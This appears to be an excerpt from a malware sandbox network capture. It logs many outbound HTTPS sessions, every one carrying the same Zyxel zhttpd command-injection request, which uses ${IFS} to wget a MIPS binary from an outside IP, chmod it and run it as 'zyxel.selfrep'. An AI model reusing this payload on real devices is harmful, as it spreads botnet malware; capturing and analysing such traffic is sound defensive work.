                                              Jan 29, 2024 07:03:46.954555988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3719192.168.2.1439040216.48.253.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954591990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3720192.168.2.1456958208.127.188.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954612970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3721192.168.2.14522782.35.26.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954653978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3722192.168.2.1443698202.110.41.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954683065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3723192.168.2.1439508153.105.45.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954730034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3724192.168.2.1455274114.178.211.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954762936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3725192.168.2.145268678.237.13.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954826117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3726192.168.2.1447536116.67.169.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954855919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3727192.168.2.1440294189.195.74.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954896927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3728192.168.2.1434568120.203.27.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954933882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3729192.168.2.145685870.195.42.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955024958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3730192.168.2.1434400134.65.194.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955070972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3731192.168.2.144092097.67.192.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955101967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3732192.168.2.1435124179.248.229.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955132008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3733192.168.2.1437656175.225.79.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955162048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3734192.168.2.1452802145.83.185.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955214024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3735192.168.2.1454286220.99.206.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955250025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3736192.168.2.1450912193.26.183.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955269098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3737192.168.2.144509269.9.199.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955324888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3738192.168.2.1437978213.82.56.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955344915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3739192.168.2.146085676.136.27.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955377102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3740192.168.2.1443200144.128.108.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955398083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3741192.168.2.1456696124.113.51.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955462933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3742192.168.2.1440706144.122.200.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955501080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3743192.168.2.1437754105.96.41.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955529928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3744192.168.2.144452250.165.197.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955562115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3745192.168.2.145798251.63.186.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955591917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3746192.168.2.1449324184.9.80.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955650091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3747192.168.2.145285691.179.45.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955672026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3748192.168.2.1451524155.133.241.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955705881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3749192.168.2.145416897.222.96.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955739975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3750192.168.2.1442004216.163.233.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955790997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3751192.168.2.145595865.125.139.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955811977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3752192.168.2.1443826131.65.191.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955847025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3753192.168.2.1446664178.47.54.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955899000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3754192.168.2.1460602188.101.49.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955934048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3755192.168.2.1446298168.210.255.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.955971003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3756192.168.2.1440326111.187.115.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.956023932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3757192.168.2.14472648.202.201.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.956068993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3758192.168.2.145304695.73.101.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.956110954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3759192.168.2.1459868173.207.92.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.956131935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3760192.168.2.1456476220.187.23.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.956166983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3761192.168.2.1453120201.12.75.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.958937883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3762192.168.2.1459046153.4.194.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967478991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3763192.168.2.145507476.159.252.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967519045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3764192.168.2.14399509.193.31.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967551947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3765192.168.2.143774692.156.222.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967605114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3766192.168.2.1455884126.243.224.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967622995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3767192.168.2.1441410161.5.5.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967681885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3768192.168.2.145276280.175.224.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967701912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3769192.168.2.143545688.253.185.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967749119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3770192.168.2.1452314164.68.134.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967775106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3771192.168.2.1452764112.127.121.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967813969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3772192.168.2.1452656153.69.73.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967864037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3773192.168.2.143769848.27.237.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967891932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3774192.168.2.1447000218.243.242.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967920065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3775192.168.2.144444696.162.101.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.967951059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3776192.168.2.1440838119.92.123.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968019009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3777192.168.2.1453426107.173.65.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968031883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3778192.168.2.1460108209.179.168.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968065977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3779192.168.2.145956819.102.195.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968101978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3780192.168.2.144849472.28.195.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968149900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3781192.168.2.1443702175.247.67.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968174934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3782192.168.2.1459030141.38.54.185443
                                              TimestampBytes transferredDirectionData
